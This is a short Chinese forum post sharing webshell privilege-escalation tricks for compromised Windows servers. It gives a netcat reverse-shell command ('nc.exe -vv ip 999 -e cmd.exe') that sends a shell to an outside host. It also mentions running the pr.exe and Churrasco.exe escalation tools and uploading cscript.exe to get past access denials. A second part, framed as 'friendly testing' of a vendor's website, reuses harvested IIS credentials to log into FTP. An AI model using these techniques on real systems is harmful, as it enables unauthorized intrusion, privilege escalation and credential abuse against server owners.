webshell下提权两个小技巧分享
<strong>webshell提权小技巧 <br /><br /></strong>cmd路径: <br />c:\windows\temp\cmd.exe <br />nc也在同目录下 <br />例如反弹cmdshell: <br />"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" <br />通常都不会成功。 <br /><br />而直接在 cmd路径上 输入 c:\windows\temp\nc.exe <br />命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe <br />却能成功。。 <br />这个不是重点 <br />我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。 <br /><br /><p><strong>友情检测波尔远程控制官方网站<br /></strong>作者:MYC00l </p>
<p>第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。</p>
<p><img title="" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2156580.jpg" onload="ResizeImage(this,520)" /></p>
<p>其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。</p>
<p>第二处:用VBS脚本查看到目标IIS帐号和密码后,CMD下FTP发现目标用的是微软FTP,直接用IIS帐号和密码登录进去了。<br /><br />IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。</p>
頁:
[1]